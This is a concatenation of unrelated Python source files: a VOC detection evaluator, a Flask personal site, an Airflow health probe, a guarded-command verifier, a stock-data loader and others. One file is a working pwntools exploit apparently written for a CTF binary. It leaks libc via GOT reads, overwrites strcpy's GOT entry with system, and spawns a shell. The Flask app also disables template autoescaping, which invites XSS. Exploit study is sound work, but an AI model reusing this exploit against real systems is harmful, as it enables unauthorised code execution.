            print("Number of state1 triggers: " + str(counter_state_1))
            print("Number of state2 triggers: " + str(counter_state_2))
            print("Number of state1 error triggers: " + str(counter_state_1_error))
            # Bug fix: this label previously said "state1" for the state2 counter.
            print("Number of state2 error triggers: " + str(counter_state_2_error))
            test.report(False, str(input_data), input_data, response)
            # Dump the full log on failure to aid debugging.
            for line in log_lines:
                print(line.strip())
        test.undeploy_workflow()
        test.cleanup()
|
# -*- coding: utf-8 -*-
# @Time : 5/24/18 10:54 AM
# @Author : yunfan
# @File : voc_eval.py
import numpy as np
import json
import cPickle
from DetmAPinVOC import DetmAPinVOC
from gluoncv.data.pascal_voc.detection import VOCDetection
DEBUG = False
VOC_2007_JSON_PATH = './VOC2007-SSD-512.json'
def res_to_allbbox(voc_classes, path=VOC_2007_JSON_PATH, num_images=4952):
    """Convert a detection-result JSON file into the nested-list layout
    expected by DetmAPinVOC.evaluate_detections.

    Parameters:
        voc_classes: list of class names; position in the list is the class index.
        path: JSON file mapping image filenames to lists of detection dicts.
        num_images: size of the image set (4952 = VOC2007 test split).
            Previously hard-coded; parameterized so other splits can be used.

    Returns:
        detections[class_index][image_index] -> np.array of
        [xmin, ymin, xmax, ymax, score] rows (possibly empty).

    NOTE(review): relies on the module-level `pascalVOC` object created in
    the __main__ block for the filename -> image-index mapping.
    """
    with open(path, 'r') as f:
        res = json.load(f)
    # Pre-allocate one empty bbox list per (class, image) pair.
    detections = [[[] for _ in range(num_images)] for _ in range(len(voc_classes))]
    for res_id in res.keys():
        val = res[res_id]  # [{"loc":[xmin, ymin, xmax, ymax], "soc":0.8, "clsna":"car", "clsid":6},{}...]
        im_ind = res_id[-10:-4]  # e.g. "006907" — filename stem without extension
        im_id = pascalVOC.image_set_index.index(im_ind)
        for bbox in val:
            soc = bbox['soc']
            clsna = bbox['clsna']
            loc = bbox['loc']
            loc.append(float(soc))  # -> [x1, y1, x2, y2, score]
            cls_ind = voc_classes.index(clsna)
            detections[cls_ind][im_id].append(loc)
    # Convert every per-image list into an ndarray as the evaluator expects.
    for cls_ind in range(len(detections)):
        rr = detections[cls_ind]
        for im_ind in range(len(rr)):
            detections[cls_ind][im_ind] = np.array(detections[cls_ind][im_ind])
    return detections
def from_VOC_label():
    """Build a pseudo-detection dict from the VOC2007 test ground-truth labels.

    Every ground-truth box is given confidence 1.0, so feeding the result to
    the evaluator should yield (near) perfect mAP — a sanity check.

    Returns: {class_index: {image_id: np.array of [x1, y1, x2, y2, 1.0]}}.
    NOTE(review): uses the module-level `pascalVOC` for class-index remapping
    and a hard-coded local dataset path.
    """
    voc_2007_test_set = VOCDetection(
        root='/Users/yunfanlu/WorkPlace/MyData/VOCDevkit',
        splits=((2007, 'test'),)
    )
    voc_2007_det_label = {}
    for ind in range(len(voc_2007_test_set)):
        # _items[ind][1] is the image id string for this sample.
        image_ind = voc_2007_test_set._items[ind][1]
        bbox_list = voc_2007_test_set[ind][1]
        for bbox in bbox_list:
            bbox_coord = bbox[:4].tolist()
            class_id = int(bbox[4])
            class_name = voc_2007_test_set.CLASSES[class_id]
            # Remap gluoncv's class id onto pascalVOC's class ordering.
            class_new_id = pascalVOC.classes.index(class_name)
            if class_new_id not in voc_2007_det_label.keys():
                voc_2007_det_label[class_new_id] = {}
            if image_ind not in voc_2007_det_label[class_new_id].keys():
                voc_2007_det_label[class_new_id][image_ind] = []
            bbox_coord.append(1.0)  # ground truth gets full confidence
            voc_2007_det_label[class_new_id][image_ind].append(bbox_coord)
    for i in voc_2007_det_label.keys():
        for j in voc_2007_det_label[i].keys():
            voc_2007_det_label[i][j] = np.array(voc_2007_det_label[i][j])
    return voc_2007_det_label
def from_pkl_file(file_path='/Users/yunfanlu/GithubProject/12 Mask RCNN/EvaluationInPascalVOC/test/voc_2007_test_detections.pkl'):
    """Load previously pickled detections.

    The path was hard-coded; it is now a parameter with the old value as
    default, so existing callers are unaffected.
    """
    with open(file_path, 'rb') as f:
        data = cPickle.load(f)
    return data
if __name__ == '__main__':
    # Module-global evaluator; res_to_allbbox/from_VOC_label read it.
    pascalVOC = DetmAPinVOC(
        image_set='2007_test',
        devkit_path='/Users/yunfanlu/WorkPlace/MyData/VOCDevkit')
    if DEBUG:
        # detections = from_VOC_label()
        detections = from_pkl_file()
    else:
        detections = res_to_allbbox(voc_classes=pascalVOC.classes)
    pascalVOC.evaluate_detections(detections=detections)
|
from flask import Flask, session, request, jsonify, render_template
from flask.ext.cache import Cache
import os
import json
# SETUP ======================================================================================
app = Flask(__name__) #APPLICATION
app.config.from_object(__name__)
app.jinja_env.autoescape = False # this allows HTML tags to be read in from strings in the Gallery section
app.jinja_env.lstrip_blocks = True # strip the whitespace from jinja template lines
app.jinja_env.trim_blocks = True
app.secret_key = 'gh-projects' # decryption key for session variable
cache = Cache(app, config={'CACHE_TYPE': 'simple'}) # initialize cache to store objects
def getLocs(index):  # page background scrolling using session variables
    """Track background scroll positions across requests.

    The previous destination becomes the new origin; on the very first
    request of a session there is no previous destination, so both ends
    are set to *index* (no movement).
    """
    if 'toLoc' in session:
        session['fromLoc'] = session['toLoc']
        session['toLoc'] = index
    else:
        session['toLoc'] = index
        session['fromLoc'] = index
    return {
        'from': session['fromLoc'],
        'to': session['toLoc'],
    }
# ROUTES =====================================================================================
@app.route('/')
def landing_page():
    """Render the home page (background position index 0)."""
    return render_template('home.html', locs=getLocs(0))
# MAIN PAGES ------------------------------------
@app.route('/about')
def about():
    """Render the About page with the language-bar script attached."""
    page_scripts = ['/static/js/language_bar.js']
    return render_template('about.html', locs=getLocs(1), active='about',
                           scripts=page_scripts)
@app.route('/projects')
def projects():
    """Render the Projects page (background position index 2)."""
    return render_template('projects.html', locs=getLocs(2), active='projects')
@app.route('/portfolio')
@app.route('/portfolio/gallery')
def portfolio():
    """Render the Portfolio page; also serves the bare gallery URL."""
    return render_template('portfolio.html', locs=getLocs(3), active='portfolio')
@app.route('/contact')
def contact():
    """Render the Contact page (background position index 4)."""
    return render_template('contact.html', locs=getLocs(4), active='contact')
# SUB PAGES -------------------------------------
@app.route('/about/why_robots')
def whyRobots():
    """Render the "why robots" sub-page, breadcrumbed under About."""
    return render_template('subpages/why_robots.html', locs=getLocs(1),
                           active='about', crumblist=['about', 'why_robots'])
@app.route('/portfolio/gallery/<gallery>')  # dynamic path to different galleries
def gallery(gallery='full'):
    """Render a gallery page described by static/gallery/<gallery>.json.

    Fix: the JSON file was opened/read/closed manually, leaking the file
    handle if parsing raised. A context manager now guarantees the handle
    is closed, and json.load replaces the read-then-loads two-step.
    """
    fromTo = getLocs(3)
    here = os.path.dirname(os.path.abspath(__file__))  # current directory
    filename = '%s/static/gallery/%s.json' % (here, gallery)
    with open(filename, 'r') as gallery_file:
        gallery_dict = json.load(gallery_file)
    extra_scripts = [  # extra scripts to be used with the gallery
        '/static/js/gallery.js',
        'https://ajax.googleapis.com/ajax/libs/jquery/2.1.4/jquery.min.js'
    ]
    crumbs = ['portfolio', gallery]
    return render_template('subpages/gallery.html',
                           locs=fromTo,
                           active='portfolio',
                           gallery=gallery_dict,
                           css="gallery.css",
                           crumblist=crumbs,
                           scripts=extra_scripts)
@app.route('/mobile')
def mobile_redirect():
    """Render the static mobile landing page."""
    return render_template('subpages/mobile.html')
# RUN =======================================================================================
if __name__ == '__main__':
    # Development server only — debug=True enables the interactive debugger
    # and must not be used in production.
    app.run(
        host = '127.0.0.1',
        port = 5000,
        debug = True
    )
|
# Repeatedly read a term count n and a sequence of integers; decide from the
# first three terms whether the sequence is arithmetic or geometric, then
# print the sum of its first n terms. A count of 0 terminates the loop.
while True:
    n = int(input())
    if n == 0:
        break
    terms = list(map(int, input().split()))
    total = 0
    value = terms[0]
    if terms[2] - terms[1] == terms[1] - terms[0]:
        # Arithmetic progression: constant difference.
        step = terms[2] - terms[1]
        for _ in range(n):
            total += value
            value += step
    else:
        # Geometric progression: constant (integer) ratio.
        ratio = terms[2] // terms[1]
        for _ in range(n):
            total += value
            value *= ratio
    print(total)
|
__author__ = "Ankur Prakash Singh"
# Date format "%m-%d-%Y"
__date__ = '02-20-2020'
"""Max Profit With Transactions"""
|
from datetime import timedelta
from sqlalchemy import func
"""
https://github.com/apache/airflow/blob/16d93c9e45e14179c7822fed248743f0c3fd935c/airflow/www_rbac/views.py#L153
Script that can be used to check if scheduler running correctly as it can sometimes gets stuck
unable to schedule new tasks despite the process looking healthy.
This imitates the logic that exists in the airflow webservers health check endpoint, but runs
locally so it can be used as a simple pod livenessProbe.
Example of usage by a livenessProbe inside a kubernetes pod spec ::
livenessProbe:
exec:
command:
- python3
- /path/to/script/scheduler_health_check.py
periodSeconds: 300
timeoutSeconds: 15
"""
def main():
    """Return 0 if the scheduler heartbeat is fresh, 1 otherwise (pod exit code)."""
    # Inline the airflow imports because they cause the global config to be loaded
    from airflow.utils import timezone
    from airflow import jobs
    from airflow.configuration import conf
    from airflow.settings import configure_orm, Session

    configure_orm(disable_connection_pool=True)
    base_job_model = jobs.BaseJob
    scheduler_health_check_threshold = timedelta(
        seconds=conf.getint('scheduler', 'scheduler_health_check_threshold')
    )

    # Best-effort DB query: any failure leaves the heartbeat unset, which is
    # reported as unhealthy below rather than crashing the probe.
    latest_scheduler_heartbeat = None
    try:
        latest_scheduler_heartbeat = (
            Session.query(func.max(base_job_model.latest_heartbeat))
            .filter(base_job_model.state == 'running', base_job_model.job_type == 'SchedulerJob')
            .scalar()
        )
    except Exception:
        pass

    # Healthy only when a heartbeat exists and is within the threshold.
    if latest_scheduler_heartbeat and \
            timezone.utcnow() - latest_scheduler_heartbeat <= scheduler_health_check_threshold:
        return 0
    return 1


if __name__ == "__main__":
    exit(main())
|
from pwn import *
context(arch='amd64',os='linux',log_level='debug')
# Short aliases over the global `io` process tube.
sl = lambda x:io.sendline(x)
s = lambda x:io.send(x)
rn = lambda x:io.recv(x)
ru = lambda x:io.recvuntil(x, drop=True)
r = lambda :io.recv()
it = lambda: io.interactive()
success = lambda x:log.success(x)
binary = './task_magic'
io = process(binary)
def debug():
    # Attach gdb to the live process and pause until Enter is pressed.
    gdb.attach(io)
    raw_input()
def create(name):
    # Menu option 1: create an object with the given name.
    ru('choice>> ')
    sl('1')
    ru('name:')
    s(name)
def spell(index, data):
    # Menu option 2: write `data` at spell slot `index`.
    # Negative indices are used below — presumably an unchecked index
    # giving out-of-bounds writes; verify against the binary.
    ru('choice>> ')
    sl('2')
    ru('spell:')
    sl(str(index))
    ru('name:')
    s(data)
def final(index):
    # Menu option 3: pick a final "chance" slot.
    ru('choice>> ')
    sl('3')
    ru('chance:')
    sl(str(index))
puts_got = 0x602020
strcpy_got = 0x602090
create('xxx')
spell(0, '/bin/sh\x00')
# Repeated OOB writes at index -2 — presumably clobbering a stdio FILE
# structure to set up an arbitrary read; confirm against the binary layout.
for _ in range(12):
    spell(-2, '\x00')
spell(-2, '\x00'*30)
spell(-2, '\x00')
spell(0, '\x00\x00' + p64(0xfbad24a8))
spell(0, p64(puts_got) + p64(puts_got+0x60))
# Leak 8 bytes — interpreted as the runtime address of puts.
puts_address = u64(rn(8))
success("puts address: 0x%x" %(puts_address))
libc_base = puts_address - 0x6f690  # 0x6f690: puts offset in target libc — TODO confirm
success("libc base: 0x%x" %(libc_base))
sys_address = libc_base + 0x45390   # 0x45390: system offset in target libc — TODO confirm
success("system address: 0x%x" %(sys_address))
spell(0, p64(0)*2)
spell(0, p64(strcpy_got)+p64(strcpy_got+0x100)+p64(strcpy_got+50))
spell(-2, '\x00')
spell(0, p64(sys_address))
spell(0, "/bin/sh\x00")
it()
import cv2 as cv
import numpy as np
if __name__ == '__main__':
    img = cv.imread('imagem.png')
    imgGray = cv.cvtColor(img,cv.COLOR_BGR2GRAY)
    # Otsu picks the binarisation threshold automatically (the 0 is ignored).
    retval, imgOTSU = cv.threshold(imgGray,0,255,cv.THRESH_OTSU)
    # 1-wide, 3-tall rectangular structuring element.
    kernel = cv.getStructuringElement(cv.MORPH_RECT,(1,3))
    for i in range(5):
        # NOTE(review): i == 0 means iterations=0 on the first frame (no
        # erosion), and the window is titled 'imgDilate' although it shows
        # an erosion — both look unintended; confirm before changing.
        imgErode = cv.erode(imgOTSU,kernel,iterations=i)
        cv.imshow('imgDilate', imgErode)
        cv.waitKey(1000)
    cv.imshow('Gray',imgGray)
    cv.imshow('ImgOTSU',imgOTSU)
    cv.waitKey(0)
from dataclasses import dataclass
import dataclasses
from functools import reduce
from gclang.gen.GuardedVisitor import GuardedVisitor
import sympy as sp
from gclang.guarded_exception import GuardedException
from ..gen.GuardedParser import GuardedParser
def compose(*fns):
    """Compose *fns* left-to-right over application order:
    compose(f, g)(x) == f(g(x)). With no arguments, returns the identity."""
    def composed(x):
        result = x
        for fn in reversed(fns):
            result = fn(result)
        return result
    return composed
@dataclasses.dataclass
class Function:
    """A user-defined macro: its formal parameter names and unevaluated body."""
    # Formal parameter names, in declaration order.
    parameters: list[str]
    # Parse-tree body; re-visited on every macro call.
    body: GuardedParser.OperatorListContext
class ReverseVisitor(GuardedVisitor):
    """Derives the weakest precondition of a guarded-command program.

    The program is walked *backwards*: a sympy predicate (initially the
    post-condition) sits on ``_predicate_stack`` and is transformed by each
    operator in reverse order. ``do..od`` loops cannot be inverted, so their
    invariants generate proof obligations collected in ``_claims`` and
    printed at the end.
    """

    def __init__(self):
        self._functions = {}          # macro name -> Function(parameters, body)
        self._replacement_stack = []  # one {formal symbol: actual expr} per active macro call
        self._predicate_stack = []    # predicate being pushed backwards
        self._depth = 1               # indent level for the derivation trace
        self._claims = []             # formulas left for the user to prove
        self._replace = True          # False while evaluating macro arguments

    def visitTrue(self, ctx):
        return sp.true

    def visitFalse(self, ctx):
        return sp.false

    def visitIdentifier(self, ctx: GuardedParser.IdentifierContext):
        identifier = sp.Symbol(ctx.getText())
        # Inside a macro body, formal parameters are renamed "local <arg>".
        if self._replace and self._replacement_stack and identifier in self._replacement_stack[-1]:
            return sp.Symbol('local ' + str(self._replacement_stack[-1][identifier]))
        return identifier

    def visitNumber(self, ctx: GuardedParser.NumberContext):
        return sp.Number(ctx.getText())

    def visitUnarySub(self, ctx: GuardedParser.UnarySubContext):
        return -self.visit(ctx.getChild(0, GuardedParser.ExpressionContext))

    def visitNegate(self, ctx: GuardedParser.NegateContext):
        return sp.Not(self.visit(ctx.getChild(0, GuardedParser.ExpressionContext)))

    def visitAnd(self, ctx: GuardedParser.AndContext):
        left, right = [self.visit(node) for node in ctx.getTypedRuleContexts(
            GuardedParser.ExpressionContext)]
        return sp.And(left, right)

    def visitOr(self, ctx: GuardedParser.OrContext):
        left, right = [self.visit(node) for node in ctx.getTypedRuleContexts(
            GuardedParser.ExpressionContext)]
        return sp.Or(left, right)

    def visitImpl(self, ctx: GuardedParser.ImplContext):
        # a -> b encoded as (not a) or b.
        left, right = [self.visit(node) for node in ctx.getTypedRuleContexts(
            GuardedParser.ExpressionContext)]
        return sp.Or(sp.Not(left), right)

    def visitExprMacroCall(self, ctx: GuardedParser.ExprMacroCallContext):
        # Expression-position macro call: kept as an uninterpreted function.
        function_name = ctx.getToken(GuardedParser.ID, 0).getText()
        parameters_ctx = ctx.getChild(
            0, GuardedParser.ActualParametersContext)
        parameters = [self.visit(node) for node in parameters_ctx.getTypedRuleContexts(
            GuardedParser.ExpressionContext
        )]
        return sp.Function(function_name)(*parameters)

    def visitLogic(self, ctx: GuardedParser.LogicContext):
        # Dispatch on the comparison token sitting between the operands.
        left, right = [self.visit(node) for node in ctx.getTypedRuleContexts(
            GuardedParser.ExpressionContext)]
        return {
            ctx.LT(): lambda x, y: sp.Lt(x, y),
            ctx.LE(): lambda x, y: sp.Le(x, y),
            ctx.GT(): lambda x, y: sp.Gt(x, y),
            ctx.GE(): lambda x, y: sp.Ge(x, y),
            ctx.EQ(): lambda x, y: sp.Eq(x, y),
            ctx.NEQ(): lambda x, y: sp.Not(sp.Eq(x, y)),
        }[ctx.getChild(1)](left, right)

    def visitAddSub(self, ctx: GuardedParser.AddSubContext):
        left, right = [self.visit(node) for node in ctx.getTypedRuleContexts(
            GuardedParser.ExpressionContext)]
        return {
            ctx.ADD(): lambda x, y: sp.Add(x, y),
            ctx.SUB(): lambda x, y: sp.Add(x, sp.Mul(-1, y)),
        }[ctx.getChild(1)](left, right)

    def visitMulDiv(self, ctx: GuardedParser.MulDivContext):
        left, right = [self.visit(node) for node in ctx.getTypedRuleContexts(
            GuardedParser.ExpressionContext)]
        return {
            ctx.MUL(): lambda x, y: sp.Mul(x, y),
            ctx.DIV(): lambda x, y: sp.Mul(x, sp.Pow(y, -1)),
        }[ctx.getChild(1)](left, right)

    def visitAssignOperator(self, ctx: GuardedParser.AssignOperatorContext):
        # Weakest precondition of assignment: substitute the assigned
        # expressions for the variables in the current predicate.
        var_names = list(map(str, ctx.getTokens(GuardedParser.ID)))
        var_values = [self.visit(node) for node in ctx.getTypedRuleContexts(
            GuardedParser.ExpressionContext)]
        old_condition = self._predicate_stack.pop()
        if ctx.getTokens(GuardedParser.LOCAL_VARIABLE):
            # Local assignment: only the "local <name>" symbols are replaced.
            local_vars = map(compose(sp.Symbol, lambda v: 'local ' + v), var_names)
            new_condition = old_condition.xreplace(dict(zip(local_vars, var_values)))
        else:
            # Global assignment: replace both plain and "local" symbols.
            vars, local_vars = map(sp.Symbol, var_names), map(compose(sp.Symbol, lambda v: 'local ' + v), var_names)
            new_condition = old_condition.xreplace(
                dict(zip(local_vars, var_values)) | dict(zip(vars, var_values))
            )
        print(' ' * self._depth +
              f'{old_condition} --[assign {list(var_names)}:={var_values}]--> {new_condition}')
        self._predicate_stack.append(new_condition)

    def visitIfOperator(self, ctx: GuardedParser.AssignOperatorContext):
        # wp(if, R) = (BB) and (fuse_i -> wp(body_i, R) for every command),
        # where BB is the disjunction of all guards (some guard must fire).
        command_list_ctx = ctx.getChild(0, GuardedParser.CommandListContext)
        commands = command_list_ctx.getTypedRuleContexts(
            GuardedParser.CommandContext)
        predicate = self._predicate_stack.pop()

        @dataclass
        class Command:
            fuse: sp.Basic       # the guard expression
            predicate: sp.Basic  # wp of the guarded body

        command_predicates: list[Command] = []
        for command in commands:
            fuse = self.visit(command.getChild(
                0, GuardedParser.ExpressionContext))
            body = command.getChild(0, GuardedParser.OperatorListContext)
            # Each branch starts from the same post-predicate.
            self._predicate_stack.append(predicate)
            self.visitOperatorList(body)
            new_predicate = self._predicate_stack.pop()
            command_predicates.append(
                Command(fuse=fuse, predicate=new_predicate))
        BB = reduce(
            sp.Or, [c.fuse for c in command_predicates], sp.false)
        R = reduce(
            sp.And, [sp.Implies(c.fuse, c.predicate) for c in command_predicates], sp.true)
        new_predicate = sp.And(BB, R)
        print(' ' * self._depth +
              f'{str(predicate)} --[if]--> {str(new_predicate)}')
        self._predicate_stack.append(new_predicate)

    def visitDoOperator(self, ctx: GuardedParser.DoOperatorContext):
        # Loops require a user-supplied invariant; the invariant becomes the
        # new predicate and (invariant and not(any guard) -> old predicate)
        # is recorded as a proof obligation.
        condition = ctx.getChild(0, GuardedParser.ConditionContext)
        if condition == None:
            raise GuardedException(ctx.start.line, "do..od operator without invariant in deriving mode")
        invariant = self.visitCondition(condition)
        old_predicate = self._predicate_stack.pop()
        self._predicate_stack.append(invariant)
        command_list_ctx = ctx.getChild(0, GuardedParser.CommandListContext)
        commands = command_list_ctx.getTypedRuleContexts(
            GuardedParser.CommandContext)
        R = reduce(
            sp.And,
            map(compose(sp.Not, self.visit), [c.getChild(
                0, GuardedParser.ExpressionContext) for c in commands]),
            invariant
        )
        claim_predicate = sp.Implies(
            R.simplify(), old_predicate)
        self._claims.append(str(claim_predicate))

    def visitOperatorList(self, ctx: GuardedParser.OperatorListContext):
        # Backward derivation: operators are processed last-to-first.
        for operator in reversed(list(ctx.getChildren())):
            self.visitOperator(operator)

    def visitStart(self, ctx: GuardedParser.StartContext):
        # Entry point: register macros, seed the stack with the
        # post-condition, walk the program backwards, report results.
        for function_definition in ctx.getTypedRuleContexts(GuardedParser.MacroOperatorDefinitionContext):
            self.visit(function_definition)
        post_condition_ctx = ctx.getChild(0, GuardedParser.ConditionContext)
        if post_condition_ctx == None:
            raise GuardedException(ctx.start.line, 'Post-condition not found')
        post_condition = self.visitCondition(post_condition_ctx)
        self._predicate_stack.append(post_condition)
        print('Post-condition:', str(post_condition))
        self.visitChildren(ctx)
        pre_condition = sp.simplify(self._predicate_stack.pop())
        print('Pre-condition:', str(pre_condition.simplify()))
        self._claims and print(
            '\nPROVE manually, that following formulas are tauthologies:')
        for i in range(len(self._claims)):
            print(f'{i + 1}. {self._claims[i]}')

    def visitCondition(self, ctx: GuardedParser.ConditionContext):
        return self.visit(ctx.getChild(0, GuardedParser.ExpressionContext))

    def visitInitialAssignments(self, ctx: GuardedParser.InitialAssignmentsContext):
        # Initial assignments play no role in backward derivation.
        pass

    def visitMacroOperatorDefinition(self, ctx: GuardedParser.MacroOperatorDefinitionContext):
        # Record the macro; its body is only visited at call sites.
        function_name = ctx.getChild(0).getText()
        function_params = ctx.getChild(0, GuardedParser.FormalParametersContext)
        params = map(compose(sp.Symbol, str), function_params.getTokens(GuardedParser.ID))
        body = ctx.getChild(0, GuardedParser.OperatorListContext)
        self._functions[function_name] = Function(list(params), body)

    def visitMacroCall(self, ctx: GuardedParser.MacroCallContext):
        function_name = ctx.getToken(GuardedParser.ID, 0).getText()
        params_ctx = ctx.getChild(0, GuardedParser.ActualParametersContext)
        function = self._functions[function_name]
        # Arguments are evaluated in the caller's scope, so parameter
        # renaming is suspended while visiting them.
        self._replace = False
        params = [self.visit(node) for node in params_ctx.getTypedRuleContexts(
            GuardedParser.ExpressionContext)]
        self._replace = True
        self._replacement_stack.append(dict(zip(function.parameters, params)))
        self.visitOperatorList(function.body)
        self._replacement_stack.pop()

    def visitBrackets(self, ctx: GuardedParser.BracketsContext):
        return self.visit(ctx.getTypedRuleContext(GuardedParser.ExpressionContext, 0))
|
import datetime
import tushare as ts
from app_registry import appRegistry as ar
from model.m_area import MArea
from model.m_industry import MIndustry
from model.m_stock import MStock
from model.m_user_stock import MUserStock
from model.m_stock_daily import MStockDaily
from util.app_util import AppUtil
'''
获取沪深两市所有挂牌股票基本信息,并保存到数据库中
'''
class CStock(object):
    """Fetch basic information for all listed Shanghai/Shenzhen stocks via
    the tushare API and persist it through the model layer."""

    def __init__(self):
        self.name = 'CStock'

    @staticmethod
    def get_stocks():
        ''' Fetch basic information of every listed stock and store it. '''
        ts.set_token(ar.ts_token)
        pro = ts.pro_api()
        data = pro.stock_basic(exchange='', list_status='L',
                    fields='ts_code,symbol,name,area,industry,list_date')
        rec_nums = data.shape[0]
        for j in range(rec_nums):
            # Iterate records in reverse order.
            # NOTE(review): DataFrame.ix is removed in modern pandas —
            # this needs .iloc with a pinned old pandas; confirm.
            rec = list(data.ix[rec_nums - 1 - j])
            flds = []
            area_id = CStock.process_area(rec[3])
            industry_id = CStock.process_industry(rec[4])
            stock_id = CStock.process_stock(rec[0], rec[1], rec[2],
                        area_id, industry_id, rec[5])
        print('^_^ End caller={0}'.format(ar.caller))

    @staticmethod
    def process_area(area_name):
        '''
        Process area info: if the area does not exist, insert it;
        either way return its area_id.
        '''
        area_id = MArea.get_area_id_by_name(area_name)
        if area_id>0:
            print('地区存在:{0}'.format(area_name))
        else:
            area_id = MArea.add_area(area_name)
            print('添加地区:{0}---{1}'.format(area_id, area_name))
        return area_id

    @staticmethod
    def process_industry(industry_name):
        '''
        Process industry info: if the industry does not exist, insert it;
        either way return its industry_id.
        '''
        industry_id = MIndustry.get_industry_id_by_name(industry_name)
        if industry_id>0:
            print('行业存在:{0}'.format(industry_name))
        else:
            industry_id = MIndustry.add_industry(industry_name)
            print('添加行业:{0}---{1}'.format(industry_id, industry_name))
        return industry_id

    @staticmethod
    def process_stock(ts_code, symbol, stock_name, area_id,
                industry_id, list_date):
        '''
        Process stock info: if the stock does not exist, insert it;
        either way return its stock id.
        '''
        stock_id = MStock.get_stock_id_by_name(stock_name)
        if stock_id > 0:
            print('股票存在:{0}'.format(stock_name))
        else:
            stock_id = MStock.add_stock(ts_code, symbol,
                    stock_name, area_id, industry_id, list_date)
            print('添加股票:{0}---{1}'.format(stock_id, stock_name))
        return stock_id

    @staticmethod
    def get_user_stock_hold(user_stock_id):
        '''
        Get the user's current holding for the given stock.
        @param user_stock_id: user/stock pair id (derivable from user_id and stock_id)
        @return number of shares held (0 when no record exists)
        @version v0.0.1 闫涛 2019-03-04
        '''
        rc, rows = MUserStock.get_user_stock_hold(user_stock_id)
        if rc <= 0:
            return 0
        else:
            return rows[0][0]

    @staticmethod
    def get_prev_day_close_price(ts_code, curr_date):
        '''
        Get the previous trading day's closing price; when the previous day
        is not a trading day, keep stepping backwards until one is found.
        @param curr_date: current date, formatted like 20190304
        @return previous trading day's close price (in cents)
        @version v0.0.1 闫涛 2019-03-05
        '''
        prev_date = AppUtil.get_delta_date(curr_date, delta=-1)
        curr_date = prev_date
        rc, rows = MStockDaily.get_close(ts_code, prev_date)
        while rc <= 0:
            # No quote for that day — step back one more day.
            prev_date = AppUtil.get_delta_date(curr_date, delta=-1)
            curr_date = prev_date
            rc, rows = MStockDaily.get_close(ts_code, prev_date)
            print('处理日期:{0}; rc={1}'.format(prev_date, rc))
        return rows[0][0]

    @staticmethod
    def get_stock_vo_of_user(user_stock_id):
        '''
        Look up basic stock info through a user's holding record.
        @param user_stock_id: user holding id
        @return stock info row, or [] when not found
        @version v0.0.1 闫涛 2019-03-05
        '''
        rc, rows = MUserStock.get_stock_vo(user_stock_id)
        if rc <= 0:
            return []
        else:
            return rows[0]

    @staticmethod
    def get_stock_vo_by_id(stock_id):
        '''
        Look up basic stock info by stock id.
        @param stock_id: stock id
        @return row of (ts_code, symbol, name) when found, else []
        @version v0.0.1 闫涛 2019-03-06
        '''
        rc, rows = MStock.get_stock_vo_by_id(stock_id)
        if rc <= 0:
            return []
        else:
            return rows[0]

    @staticmethod
    def get_stock_id_by_ts_code(ts_code):
        '''
        Resolve a ts_code into the internal stock_id.
        @param ts_code: stock code
        @return stock_id, or 0 when not found
        @version v0.0.1 闫涛 2019-03-06
        '''
        rc, rows = MStock.get_stock_id_by_ts_code(ts_code)
        if rc <= 0:
            return 0
        else:
            return rows[0][0]
|
import random
def make_lst():
    """Prompt for a count and an inclusive [low, high] range, then return a
    list of `count` random integers drawn from that range."""
    count = int(input("How many numbers do you need? "))
    low = int(input("What's the lowest number? "))
    high = int(input("What's the highest number? ")) + 1  # randrange excludes the stop value
    return [random.randrange(low, high) for _ in range(count)]
# Bug fix: the function defined above is `make_lst`; calling the
# misspelled `make_list` raised NameError at runtime.
print(make_lst())
#!/usr/bin/python
# Copyright (c) 2009 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
This tool creates a tarball with all the sources, but without .svn directories.
It can also remove files which are not strictly required for build, so that
the resulting tarball can be reasonably small (last time it was ~110 MB).
Example usage (make sure gclient is in your PATH):
export_tarball.py /foo/bar
The above will create file /foo/bar.tar.bz2.
"""
from __future__ import with_statement
import contextlib
import optparse
import os
import shutil
import subprocess
import sys
import tarfile
import tempfile
def RunCommand(argv):
  """Runs the command with given argv and returns exit code."""
  try:
    # stdout=None inherits the parent's stdout, so communicate() returns
    # None for stdout and `output` below is always None.
    proc = subprocess.Popen(argv, stdout=None)
  except OSError:
    # Command not found / not executable.
    return 1
  output = proc.communicate()[0]
  return proc.returncode
def main(argv):
  """Exports a gclient checkout to <arg>.tar.bz2; returns a process exit code.

  Python 2 script. Expects exactly one positional argument: the output
  path without the .tar.bz2 extension.
  """
  parser = optparse.OptionParser()
  parser.add_option("--remove-nonessential-files",
                    dest="remove_nonessential_files",
                    action="store_true", default=False)
  options, args = parser.parse_args(argv)
  if len(args) != 1:
    print 'You must provide only one argument: output file name'
    print '(without .tar.bz2 extension).'
    return 1
  output_fullname = args[0] + '.tar.bz2'
  output_basename = os.path.basename(args[0])
  # Export into a temp dir so the working checkout is never modified;
  # the finally-block below guarantees cleanup.
  target_dir = tempfile.mkdtemp()
  try:
    if RunCommand(['gclient', 'export', target_dir]) != 0:
      print 'gclient failed'
      return 1
    if options.remove_nonessential_files:
      # Directories not required for building (test data, samples, docs).
      nonessential_dirs = (
          'src/chrome/test/data',
          'src/chrome/tools/test/reference_build',
          'src/gears/binaries',
          'src/net/data/cache_tests',
          'src/o3d/documentation',
          'src/o3d/samples',
          'src/third_party/lighttpd',
          'src/third_party/WebKit/LayoutTests',
          'src/webkit/data/layout_tests',
          'src/webkit/tools/test/reference_build',
      )
      for dir in nonessential_dirs:
        path = os.path.join(target_dir, dir)
        try:
          print 'removing %s...' % dir
          shutil.rmtree(path)
        except OSError, e:
          # Best-effort: a missing directory is not fatal.
          print 'error while trying to remove %s, skipping' % dir
    with contextlib.closing(tarfile.open(output_fullname, 'w:bz2')) as archive:
      archive.add(os.path.join(target_dir, 'src'), arcname=output_basename)
  finally:
    shutil.rmtree(target_dir)
  return 0


if __name__ == "__main__":
  sys.exit(main(sys.argv[1:]))
|
#!/usr/bin/python
from sys import *
def generic_istream(filename):
    """Open *filename* for reading; "-" means standard input.

    Bug fix: this module does ``from sys import *``, so the name ``sys``
    itself is never bound — ``return sys.stdin`` raised NameError whenever
    "-" was passed. The star-import provides ``stdin`` directly.
    """
    #print >> stderr,"opening ",filename
    if filename=="-":
        return stdin
    else:
        return open(filename)
def printUsageAndExit(programName):
    # Print a usage line to stderr and terminate (Python 2 print syntax).
    print >> stderr,programName,"fastafile > outfile"
    exit()
def softMaskToHardMaskSeq(seq):
    """Return *seq* with every lowercase (soft-masked) base replaced by 'N'.

    Fix: the original built the result with repeated string concatenation,
    which is quadratic in sequence length; ''.join over a generator is
